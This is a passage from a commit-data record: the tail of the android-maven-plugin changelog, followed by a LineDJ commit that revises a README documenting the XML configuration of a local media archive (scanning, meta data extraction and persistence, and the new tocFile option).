Google Code project content into site content\n** Contributed by Manfred Moser http:\/\/www.simpligility.com\n* Plugin updates\n** Contributed by Manfred Moser http:\/\/www.simpligility.com\n\n== 4.2.1 - released 2015-05-07\n\nhttps:\/\/groups.google.com\/d\/msg\/maven-android-developers\/HOIC3b7MmoA\/Z8XUXpsmT-EJ[Release Announcement Post]\n\n* Refactored code base to com.simpligility to follow groupId\n** Contributed by Manfred Moser http:\/\/www.simpligility.com\n* Fixed NPE for undefined versionNamingPattern in ManifestMojo\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/622\n** Contributed by Leonid https:\/\/github.com\/greek1979\n* Fixed Error generating BuildConfig (ZipException: zip file is empty) if one of the dependent AARs has an empty classes.zip\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/626\n** Contributed by William Ferguson https:\/\/github.com\/william-ferguson-au\n* Updated Android SDK libraries 1.2.2 \/ 24.2.2\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Support for Junit4 Test Runner based tests\n** Usage requires deployment of Android SDK supplied Maven repositories to the\n local repository e.g. with Maven Android SDK Deployer\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/625\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/623\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/617\n** contributed by Hoyt Summers Pittman https:\/\/github.com\/secondsun\n\n== 4.2.0 - released 2015-04-15\n\nhttps:\/\/groups.google.com\/d\/msg\/maven-android-developers\/-HhJutxX0u8\/PAKA2dYDK2wJ[Release Announcement Post]\n\n* Include internal jars from aar libraries by default\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/586#issuecomment-74931486\n* Don't include internal libs from transitive AAR deps into an AAR\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/589\n** contributed by Philip Schiffer https:\/\/github.com\/hameno\n* Better doco for destinationAndroidManifest parameter\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/594\n** contributed by Matthias Stevens https:\/\/github.com\/mstevens83\n* Project META-INF artifacts are included in APK\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/602\n** Contributed by Marek Marek Kedzierski https:\/\/github.com\/kedzie\n* Support for specifying debug port - automatically forward JDWP connection\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/584\n** and follow up commits\n** contributed by Jaroslav Tulach https:\/\/github.com\/jtulach\n** and Manfred Moser http:\/\/www.simpligility.com\n* Configurable encoding for publish mojo listing files\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/603\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/601\n** contributed by Csaba Koz\u00e1k https:\/\/github.com\/WonderCsabo\n* Checkstyle - removed deprecated check\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/609\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Add NDK support for arm64-v8a APP_ABI \n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/574\n** contributed by https:\/\/github.com\/arnaud-soulard\n* Log warning about using dependencies conflicting with packaged libraries in android 
jar \n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/610\n** contributed by Csaba Koz\u00e1k https:\/\/github.com\/WonderCsabo\n* Allow AAR provided proguard configuration to be automatically integrated\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/612\n** contributed by Philip Schiffer https:\/\/github.com\/hameno\n* Updated Android SDK libraries 1.1.3 \/ 24.1.3\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/commit\/60ec75aa8ab889c7033fd403149973c0d3b66f82\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/commit\/869578d84af1f215bca341191bb0078899e3330c\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Regex support for VersionGenerator\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/605\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/606\n** contributed by Wang Xuerui https:\/\/github.com\/xen0n\n\n== 4.1.1 or higher - released 2015-02-02\n\nhttps:\/\/groups.google.com\/d\/msg\/maven-android-developers\/EXYhXO1hbwM\/L2mS3Ho7-kQJ[Release Announcement Post]\n\n* Added Manifest Merger v2 example (tictactoe) & Deprecated merge manifest v1\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/560\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Added proguard support from library (AAR) projects\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/559\n** contributed by David Sobreira Marques https:\/\/github.com\/dpsm\n* Updated Takari lifecyle and integration testing setup to new releases\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/564\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n** and Igor Fedorenko https:\/\/github.com\/ifedorenko\n** sponsored by Takari http:\/\/takari.io\/\n* Fix to allow both release-plugin and IDEs to correctly consume AAR deps.\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/565\n** contributed by Hoyt Summers Pittman https:\/\/github.com\/secondsun\n* Change default value for aidlSourceDirectory to src\/main\/aidl\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/555\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/557\n** contributed by Csaba Koz\u00e1k https:\/\/github.com\/WonderCsabo\n* Documentation updates for the site rendering\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/567\n** and other commits\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Corrected unpackedLibsFolder default value\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/575\n** contributed by Pappy Stanescu https:\/\/github.com\/pa314159\n* Improvement of versionCode generator\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/570\n** contributed by Pappy Stanescu https:\/\/github.com\/pa314159\n\n== 4.1.0 - released 2015-01-08\n\nhttps:\/\/groups.google.com\/d\/msg\/maven-android-developers\/oNm46DqGi2Q\/Gs3cQAQ018gJ[Release Announcement Post]\n\n* Updated to Android SDK libraries 1.0.0 \/ 24.0.0\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/531\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Use lint from Android SDK libraries rather than command line invocation\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/528\n** fixes 
https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/400\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/357\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/476\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Making unpacked-libs folder configurable\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/538\n** contributed by William Ferguson https:\/\/github.com\/william-ferguson-au\n* Added deprecation for APKLIB format\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/543\n* Use the Google Play Developer API to upload APKs and update the store listing\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/534\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/418\n** contributed by Joris de Groot https:\/\/github.com\/jdegroot\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Improvements to project site including github ribbon and more\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/544\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Added Manifest Merger V2 and deprecated Manifest-Update mojo\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/539\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/519\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Refactor the 3 parameters used for the androidManifest.xml into 2 params \n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/542\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/508\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Fixed broken undeploy mojo AndroidManifest parsing\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/550\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* MultiDex improvement - generating mainDexClasses when multiDex flag set to true and mainDexList is null\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/526\n** contributed by Piotr Sor\u00f3bka https:\/\/github.com\/psorobka\n* A whole bunch minor project improvements and fixes\n** see commit history\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n\nATTENTION:\n\n* updatedManifestFile & sourceManifestFile parameters have been removed.\n* use androidManifestFile and destinationManifestFile\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/542\n\n\n== 4.0.0 - released 2014-11-25\n\nhttps:\/\/groups.google.com\/d\/msg\/maven-android-developers\/9ogkKf0Xr7Y\/F9CKX6LV0uAJ[Release Announcement Post]\n\n* Migrated some documentation from the old Google Code site\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Fix for aar and jar dependency mix and related resolving\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/493\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/485\n** contributed by Hoyt Summers Pittman https:\/\/github.com\/secondsun\n* Fixes to proguard and multidex related processing\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/509\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/507\n** contributed by \u0141ukasz Suski https:\/\/github.com\/lsuski\n* Documentation for shading commons-codec to allow usage of newer version\n** see 
https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/498\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/487#issuecomment-60956025\n** contributed by Matthias Stevens https:\/\/github.com\/mstevens83\n* Custom exclude filter to ProGuardMojo\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/497\n** contributed by Csaba Koz\u00e1k https:\/\/github.com\/WonderCsabo\n* Fixes to resource files in sample projects to allow builds to pass with new SDK\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/514\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Always honor dexArguments parameters\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/517\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Downgraded runtime requirements to Maven 3.0.4\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Examples documentation\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Moved Emma analysis to process-classes phase\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/489\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/515\n** contributed by Dmitry Berezhnoy https:\/\/github.com\/deadmoto\n\n== 4.0.0-rc.3 - released 2014-10-28\n\nhttps:\/\/groups.google.com\/d\/msg\/maven-android-developers\/9ogkKf0Xr7Y\/F9CKX6LV0uAJ[Release Announcement Post]\n\n* Migrated complete project to new git repo at https:\/\/github.com\/simpligility\/android-maven-plugin\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Adapted codebase to new groupId \"com.simpligility.maven.plugins\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n\n== 4.0.0-rc.2 and older release notes\n\nCan be found in link:changelog-old-3x.html[the migrated changelog] from the old project site.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"812899f7743e1b05eab3874d6cfec2cec02ab3dd","subject":"archiveLocalStartup: Updated documentation.","message":"archiveLocalStartup: Updated documentation.\n\nThere is no longer a complex configuration for the table of contents\nof local archives. Therefore, this section has been removed, and other\nparts have been adapted accordingly.\n","repos":"oheger\/LineDJ","old_file":"mediaArchive\/archiveLocalStartup\/README.adoc","new_file":"mediaArchive\/archiveLocalStartup\/README.adoc","new_contents":"= Local Media Archive Startup project\n\nThis module has the purpose to start the local media archive in an OSGi\nenvironment.\n\n== Description\n\nThis module is analogous to the startup project for the union archive, but\nit is responsible for the _local media archive_. The local media archive\nscans a folder structure with media files and passes the extracted meta data\nto a union archive which can either run on the same JVM or is accessed\nremotely.\n\nAccess to the union archive is obtained through the _client application\ncontext_ available to all LineDJ platform components: actor references for the\nactors implementing the archive are simply obtained from the _media facade_.\nThat way the location of the union archive is transparent.\n\nThe local archive is implemented by the following actors:\n\n.Actors implementing the local archive\n[cols=\"1,3\",options=\"header\"]\n|==============================\n| Actor class | Description\n| ArchiveGroupActor | An actor managing a group of local paths that need to be\nparsed for meta data files. 
For each path, the actor creates the other actors\nfor managing the media files. It is also responsible for the coordination of\nscan operations.\n| PersistentMetaDataManagerActor | The actor responsible for persistent meta\ndata files. It takes care that meta data extracted from media files is stored\non the local file system and is loaded again when the local archive restarts.\n| MetaDataManagerActor | Controls the extraction of meta data from single media\nfiles and sends the results to the union archive.\n| MediaManagerActor | Scans a specified folder structure for media files and\ncollects information about media available. This information is sent to the\nunion archive.\n|==============================\n\n== Configuration\n\nThe configuration of the local media archive is also read from the\nconfiguration file of the LineDJ management application (analogously to the\nconfiguration for the union media archive; if both components are deployed in\nthe same platform container, they actually use the same configuration file,\nand also their configuration sections overlap). The settings are placed in a\nsection named _media_. Below is an example fragment with all supported\nconfiguration options:\n\n[source,xml]\n----\n<configuration>\n <media>\n <mediaArchive>\n <metaDataUpdateChunkSize>32<\/metaDataUpdateChunkSize>\n <metaDataMaxMessageSize>128<\/metaDataMaxMessageSize>\n <\/mediaArchive>\n <localArchives>\n <processorCount>1<\/processorCount>\n <readerTimeout>3600<\/readerTimeout>\n <readerCheckInterval>600<\/readerCheckInterval>\n <readerCheckInitialDelay>480<\/readerCheckInitialDelay>\n <downloadChunkSize>16384<\/downloadChunkSize>\n <infoSizeLimit>32768<\/infoSizeLimit>\n <includedExtensions>MP3<\/includedExtensions>\n <scan>\n <parseInfoTimeout>10<\/parseInfoTimeout>\n <mediaBufferSize>3<\/mediaBufferSize>\n <\/scan>\n <metaDataExtraction>\n <readChunkSize>32768<\/readChunkSize>\n <tagSizeLimit>4096<\/tagSizeLimit>\n <metaDataUpdateChunkSize>8<\/metaDataUpdateChunkSize>\n <metaDataMaxMessageSize>160<\/metaDataMaxMessageSize>\n <processingTimeout>60<\/processingTimeout>\n <\/metaDataExtraction>\n <metaDataPersistence>\n <chunkSize>4096<\/chunkSize>\n <parallelCount>2<\/parallelCount>\n <writeBlockSize>40<\/writeBlockSize>\n <\/metaDataPersistence>\n <localArchive>\n <rootPath>\/data\/music\/archive\/1and1\/media<\/rootPath>\n <archiveName>1and1-${host}<\/archiveName>\n <metaDataPersistence>\n <path>\/data\/music\/archive\/1and1\/metadata<\/path>\n <tocFile>\/data\/music\/archive\/1and1\/content.json<\/tocFile>\n <\/metaDataPersistence>\n <\/localArchive>\n <localArchive>\n <rootPath>\/data\/music\/archive\/magenta1\/media<\/rootPath>\n <archiveName>magenta1-${host}<\/archiveName>\n <metaDataPersistence>\n <path>\/data\/music\/archive\/magenta1\/metadata<\/path>\n <tocFile>\/data\/music\/archive\/magenta1\/content.json<\/tocFile>\n <\/metaDataPersistence>\n <\/localArchive>\n <\/localArchives>\n <\/media>\n<\/configuration>\n----\n\nInformation about local archives is located in a section named `localArchives`.\nThe section can contain a bunch of properties that define default settings\nvalid for all archives. Concrete archives are then defined by `localArchive`\nelements within this section. In the definition of a local archive the same\nproperties can be used as in the `localArchives` section. 
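For instance, a fragment like the following (an illustrative sketch that reuses only properties from the example above) declares `processorCount` at both levels:\n\n[source,xml]\n----\n<localArchives>\n <processorCount>1<\/processorCount>\n <localArchive>\n <rootPath>\/data\/music\/archive\/1and1\/media<\/rootPath>\n <processorCount>2<\/processorCount>\n <\/localArchive>\n<\/localArchives>\n----\n\n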
Here an override\nmechanism is in place: Properties that are not defined for a concrete archive\nuse the value set by the top-level section; and properties set for a local\narchive override the values from the top-level section. Using this scheme, it\nis typically possible to define most of the default settings once in the\n`localArchives` section, while concrete archive declarations can be kept to a\nminimum (e.g. setting specific paths only).\n\nEach local archive listed in the configuration can be given a descriptive name\nusing the _archiveName_ property. The name can be displayed by applications\nthat allow browsing archives. The archive name can contain a variable named\n`${host}`, which is replaced by the IP-address of the local machine. This can\nbe useful if the content is exposed via a remote union archive.\n\nThe options available can be grouped into different categories and are\ndescribed in the following subsections. It does not matter whether an option is\ndefined as a default or for a specific local archive.\n\n=== Location of media files\n\nA number of options define where - on the local hard disk - media files can be\nfound:\n\n.Configuration options for the location of media files\n[cols=\"1,3\",options=\"header\"]\n|============================\n| Setting | Description\n| excludedExtensions | With this list property (elements can be repeated as\noften as necessary) the extensions of files can be specified which should be\nignored when scanning for media files. Such files are not included in media.\n| includedExtensions | As an alternative to _excludedExtensions_, with this\nproperty a set of file extensions can be specified that are included; files\nwith other extensions are ignored. If both file extensions to include and to\nexclude are specified, inclusions take precedence.\n| infoSizeLimit | Files with information about a medium (typically called\n`playlist.settings`) are fully read and processed in-memory. To avoid\nunrestricted memory consumption, with this property a maximum file size (in\nbytes) can be specified. Info files which are larger will not be processed.\n| rootPath | This property defines the folder to be scanned for media files.\n| processorCount | Defines the number of reader actors processing this folder\nstructure in parallel. If multiple archives are defined, the individual archives\nare processed one by one with this number of reader actors; so this property\ndefines the total number of parallel file reads.\n| metaDataMediaBufferSize | A property determining the maximum size of the\nbuffer for media waiting to be processed for meta data extraction. During a\nmeta data scan operation, in a first step the content of media is determined.\nThen the meta data for the files on the media is obtained (either from a\npersistent storage or by meta data extraction). As this may take more time, the\nnumber of media waiting to be processed for meta data extraction may increase.\nThis property defines a threshold for this number. When it is reached, the scan\noperation is blocked until media have been processed completely. This reduces\nthe amount of memory consumption during a scan operation. The property is\noptional; a default value is used if it is not specified.\n|============================\n\n=== Settings related to scans for media files\n\nThese settings control the process of scanning a directory structure for media\nfiles. 
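For reference, the corresponding fragment from the full configuration example above looks like this:\n\n[source,xml]\n----\n<scan>\n <parseInfoTimeout>10<\/parseInfoTimeout>\n <mediaBufferSize>3<\/mediaBufferSize>\n<\/scan>\n----\n\n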
Here the file system is traversed, media files are assigned to media\n(identified by _medium description files_ with the file extension _.settings_),\nand the description files are parsed to extract meta data about these media.\nThe settings are placed in a section named _scan_.\n\n.Configuration options that control the scan process\n[cols=\"1,3,1\",options=\"header\"]\n|==============================\n| Setting | Description | Default\n| parseInfoTimeout | A timeout (in seconds) for parsing a medium description\nfile. If a parse operation takes longer than this time span, it is aborted and\ndummy meta data is used for this medium. | 60 seconds\n| mediaBufferSize | The size of the buffer for media to be processed in\nparallel. When scanning a directory structure for media files some temporary\ndata is created for assignments of files to media, parsed description files,\netc. This property defines the number of temporary artifacts of those types\nthat can exist. If this limit is reached, stream processing pauses until the\nlimiting temporary artifacts have been processed. | 8\n|==============================\n\n=== Meta data extraction\n\nThe archive parses all detected media files in order to extract meta data\n(e.g. ID3 tags) from them. With this group of options the behavior of this\nmeta data extraction process can be specified. The options are grouped in a\nsub section named _metaDataExtraction_:\n\n.Configuration options for meta data extraction\n[cols=\"1,3\",options=\"header\"]\n|============================\n| Setting | Description\n| metaDataExtraction.readChunkSize | Block size to be used when reading media\nfiles. A buffer of this size is created in memory.\n| metaDataExtraction.tagSizeLimit | Defines a maximum size of an ID3 tag to be\nprocessed. Tags can become large, e.g. when they contain an image. The archive\nonly extracts text-based meta data. If a tag length is greater than this value,\nit is ignored.\n| metaDataExtraction.processingTimeout | Here a timeout (in seconds) for the\nprocessing of a single media file can be specified. If meta data extraction for\nthis file takes longer, processing is aborted, and the file is ignored.\n|============================\n\n=== Meta data persistence\n\nOnce extracted, meta data is stored in files in JSON format on the local file\nsystem. How this is done is specified with another group of options in the\n_metaDataPersistence_ sub section:\n\n.Configuration options for persisting meta data\n[cols=\"1,3\",options=\"header\"]\n|============================\n| Setting | Description\n| metaDataPersistence.path | Defines a path (on the local file system) where\nfiles with extracted meta data information can be stored. Here files with the\nextension `.mdt` (for meta data) are created containing the ID3 information\nextracted from media files. These files are loaded when the archive starts up,\nso that media files do not have to be scanned again.\n| metaDataPersistence.chunkSize | Specifies the block size to be used when\nreading or writing meta data files.\n| metaDataPersistence.parallelCount | Here the number of meta data files that\nare read in parallel can be specified. Increasing the number can speed up the\nstartup time of the archive (provided that the local disk can handle the load).\n| metaDataPersistence.writeBlockSize | If no persistent meta data file for a\nmedium is available, a new one is created automatically when the media files\nfrom the medium are scanned. 
After some media files have been processed, an\n`.mdt` file is written out, so that the information is already persisted in\ncase the scan is aborted. The _writeBlockSize_ property defines the number of\nmedia files to be processed after the currently collected meta data is\npersisted.\n| metaDataPersistence.tocFile | A local archive can be configured to generate a\nJSON file with a table of contents, i.e. a list with all media it contains and\ntheir corresponding meta data files. This file has the same format as used by\nan _HTTP archive_ to define its content. With the _tocFile_ property, the path\nwhere to store the table of contents file can be specified. If it is missing,\nno such file is generated.\n|============================\n","old_contents":"= Local Media Archive Startup project\n\nThis module has the purpose to start the local media archive in an OSGi\nenvironment.\n\n== Description\n\nThis module is analogous to the startup project for the union archive, but\nit is responsible for the _local media archive_. The local media archive\nscans a folder structure with media files and passes the extracted meta data\nto a union archive which can either run on the same JVM or is accessed\nremotely.\n\nAccess to the union archive is obtained through the _client application\ncontext_ available to all LineDJ platform components: actor references for the\nactors implementing the archive are simply obtained from the _media facade_.\nThat way the location of the union archive is transparent.\n\nThe local archive is implemented by the following actors:\n\n.Actors implementing the local archive\n[cols=\"1,3\",options=\"header\"]\n|==============================\n| Actor class | Description\n| ArchiveGroupActor | An actor managing a group of local paths that need to be\nparsed for meta data files. For each path, the actor creates the other actors\nfor managing the media files. It is also responsible for the coordination of\nscan operations.\n| PersistentMetaDataManagerActor | The actor responsible for persistent meta\ndata files. It takes care that meta data extracted from media files is stored\non the local file system and is loaded again when the local archive restarts.\n| MetaDataManagerActor | Controls the extraction of meta data from single media\nfiles and sends the results to the union archive.\n| MediaManagerActor | Scans a specified folder structure for media files and\ncollects information about media available. This information is sent to the\nunion archive.\n|==============================\n\n== Configuration\n\nThe configuration of the local media archive is also read from the\nconfiguration file of the LineDJ management application (analogous as the\nconfiguration for the union media archive; if both components are deployed in\nthe same platform container, they actually use the same configuration file,\nand also their configuration sections overlap). The settings are placed in a\nsection named _media_. 
Below is an example fragment with all supported\nconfiguration options:\n\n[source,xml]\n----\n<configuration>\n <media>\n <mediaArchive>\n <metaDataUpdateChunkSize>32<\/metaDataUpdateChunkSize>\n <metaDataMaxMessageSize>128<\/metaDataMaxMessageSize>\n <\/mediaArchive>\n <localArchives>\n <processorCount>1<\/processorCount>\n <readerTimeout>3600<\/readerTimeout>\n <readerCheckInterval>600<\/readerCheckInterval>\n <readerCheckInitialDelay>480<\/readerCheckInitialDelay>\n <downloadChunkSize>16384<\/downloadChunkSize>\n <infoSizeLimit>32768<\/infoSizeLimit>\n <includedExtensions>MP3<\/includedExtensions>\n <scan>\n <parseInfoTimeout>10<\/parseInfoTimeout>\n <mediaBufferSize>3<\/mediaBufferSize>\n <\/scan>\n <metaDataExtraction>\n <readChunkSize>32768<\/readChunkSize>\n <tagSizeLimit>4096<\/tagSizeLimit>\n <metaDataUpdateChunkSize>8<\/metaDataUpdateChunkSize>\n <metaDataMaxMessageSize>160<\/metaDataMaxMessageSize>\n <processingTimeout>60<\/processingTimeout>\n <\/metaDataExtraction>\n <metaDataPersistence>\n <chunkSize>4096<\/chunkSize>\n <parallelCount>2<\/parallelCount>\n <writeBlockSize>40<\/writeBlockSize>\n <\/metaDataPersistence>\n <toc>\n <descRemovePrefix>\/data\/music\/archive\/media<\/descRemovePrefix>\n <descPathSeparator>\/<\/descPathSeparator>\n <descUrlEncoding>true<\/descUrlEncoding>\n <rootPrefix>\/music\/archive\/media<\/rootPrefix>\n <metaDataPrefix>\/music\/archive\/metadata\/<\/metaDataPrefix>\n <\/toc>\n <localArchive>\n <rootPath>\/data\/music\/archive\/1and1\/media<\/rootPath>\n <archiveName>1and1-${host}<\/archiveName>\n <metaDataPersistence>\n <path>\/data\/music\/archive\/1and1\/metadata<\/path>\n <\/metaDataPersistence>\n <toc>\n <file>\/data\/music\/archive\/1and1\/content.json<\/file>\n <descRemovePrefix>\/data\/music\/archive\/1and1\/media<\/descRemovePrefix>\n <\/toc>\n <\/localArchive>\n <localArchive>\n <rootPath>\/data\/music\/archive\/magenta1\/media<\/rootPath>\n <archiveName>magenta1-${host}<\/archiveName>\n <metaDataPersistence>\n <path>\/data\/music\/archive\/magenta1\/metadata<\/path>\n <\/metaDataPersistence>\n <toc>\n <file>\/data\/music\/archive\/magenta1\/content.json<\/file>\n <descRemovePrefix>\/data\/music\/archive\/magenta1\/media<\/descRemovePrefix>\n <\/toc>\n <\/localArchive>\n <\/localArchives>\n <\/media>\n<\/configuration>\n----\n\nInformation about local archives is located in a section named `localArchives`.\nThe section can contain a bunch of properties that define default settings\nvalid for all archives. Concrete archives are then defined by `localArchive`\nelements within this section. In the definition of a local archive the same\nproperties can be used as in the `localArchives` section. Here an override\nmechanism is in place: Properties that are not defined for a concrete archive\nuse the value set by the top-level section; and properties set for a local\narchive override the values from the top-level section. Using this schema, it\nis typically possible to define most of the default settings once in the\n`localArchives` section, while concrete archive declarations can be kept to a\nminimum (e.g. setting specific paths only).\n\nEach local archive listed in the configuration can be given a descriptive name\nusing the _archiveName_ property. The name can be displayed by applications\nallowing to browse archives. The archive name can contain a variable named\n`${host}`, which is replaced by the IP-address of the local machine. 
This can\nbe useful if the content is exposed via a remote union archive.\n\nThe options available can be grouped into different categories and are\ndescribed in the following subsections. It does not matter whether an option is\ndefined as a default or for a specific local archive.\n\n=== Location of media files\n\nA number of options define where - on the local hard disk - media files can be\nfound:\n\n.Configuration options for the location of media files\n[cols=\"1,3\",options=\"header\"]\n|============================\n| Setting | Description\n| excludedExtensions | With this list property (elements can be repeated as\noften as necessary) the extensions of files can be specified which should be\nignored when scanning for media files. Such files are not included in media.\n| includedExtensions | As an alternative to _excludedProperties_, with this\nproperty a set of files extensions can be specified that are included; files\nwith other extensions are ignored. If both file extensions to include and to\nexclude are specified, inclusions take precedence.\n| infoSizeLimit | Files with information about a medium (typically called\n`playlist.settings`) are fully read and processed in-memory. To avoid\nunrestricted memory consumption, with this property a maximum file size (in\nbytes) can be specified. Info files which are larger will not be processed.\n| rootPath | This property defines the folder to be scanned for media files.\n| processorCount | Defines the number of reader actors processing this folder\nstructure in parallel. If multiple archives are defined, the single archives\nare processed one by one with this number of reader actors; so this property\ndefines the total number of parallel file reads.\n| metaDataMediaBufferSize | A property determining the maximum size of the\nbuffer for media waiting to be processed for meta data extraction. During a\nmeta data scan operation, in a first step the content of media is determined.\nThen the meta data for the files on the media is obtained (either from a\npersistent storage or by meta data extraction). As this may take more time, the\nnumber of media waiting to be processed for meta data extraction may increase.\nThis property defines a threshold for this number. When it is reached the scan\noperation is blocked until media have been processed completely. This reduces\nthe amount of memory consumption during a scan operation. The property is\noptional; a default value is used if it is not specified.\n|============================\n\n=== Settings related to scans for media files\n\nThese settings control the process of scanning a directory structure for media\nfiles. Here the file system is traversed, media files are assigned to media\n(identified by _medium description files_ with the file extension _.settings_),\nand the description files are parsed to extract meta data about these media.\nThe settings are placed in a section named _scan_.\n\n.Configuration options that control the scan process\n[cols=\"1,3,1\",options=\"header\"]\n|==============================\n| Setting | Description | Default\n| parseInfoTimeout | A timeout (in seconds) for parsing a medium description\nfile. If a parse operation takes longer than this time span, it is aborted and\ndummy meta data is used for this medium. | 60 seconds\n| mediaBufferSize | The size of the buffer for media to be processed in\nparallel. When scanning a directory structure for media files some temporary\ndata is created for assignments of files to media, parsed description files,\netc. 
This property defines the number of temporary artifacts of those types\nthat can exist. If this limit is reached, stream processing pauses until the\nlimiting temporary artifacts have been processed. | 8\n|==============================\n\n=== Meta data extraction\n\nThe archive parses all detected media files in order to extract meta data\n(e.g. ID3 tags) from them. With this group of options the behavior of this\nmeta data extraction process can be specified. The options are grouped in a\nsub section named _metaDataExtraction_:\n\n.Configuration options for meta data extraction\n[cols=\"1,3\",options=\"header\"]\n|============================\n| Setting | Description\n| metaDataExtraction.readChunkSize | Block size to be used when reading media\nfiles. A buffer of this size is created in memory.\n| metaDataExtraction.tagSizeLimit | Defines a maximum size of an ID3 tag to be\nprocessed. Tags can become large, e.g. when they contain an image. The archive\nonly extracts text-based meta data. If a tag length is greater than this value,\nit is ignored.\n| metaDataExtraction.processingTimeout | Here a timeout (in seconds) for the\nprocessing of a single media file can be specified. If meta data extraction for\nthis file takes longer, processing is aborted, and the file is ignored.\n|============================\n\n=== Meta data persistence\n\nOnce extracted, meta data is stored in files in JSON format on the local file\nsystem. How this is done is specified with another group of options in the\n_metaDataPersistence_ sub section:\n\n.Configuration options for persisting meta data\n[cols=\"1,3\",options=\"header\"]\n|============================\n| Setting | Description\n| metaDataPersistence.path | Defines a path (on the local file system) where\nfiles with extracted meta data information can be stored. Here files with the\nextension `.mdt` (for meta data) are created containing the ID3 information\nextracted from media files. These files are loaded when the archive starts up,\nso that media files do not have to be scanned again.\n| metaDataPersistence.chunkSize | Specifies the block size to be used when\nreading or writing meta data files.\n| metaDataPersistence.parallelCount | Here a number can be specified how many\nmeta data files are read in parallel. Increasing the number can speedup startup\ntime of the archive (provided that the local disc can handle the load).\n| metaDataPersistence.writeBlockSize | If no persistent meta data file for a\nmedium is available, a new one is created automatically when the media files\nfrom the medium are scanned. After some media files have been processed, an\n`.mdt` file is written out, so that the information is already persisted in\ncase the scan is aborted. The _writeBlockSize_ property defines the number of\nmedia files to be processed after the currently collected meta data is\npersisted.\n|============================\n\n=== Archive table of contents\n\nA local archive can be configured to generate a JSON file with a table of\ncontents, i.e. a list with all media it contains and their corresponding meta\ndata files. This file has the same format as used by an _HTTP archive_ to\ndefine its 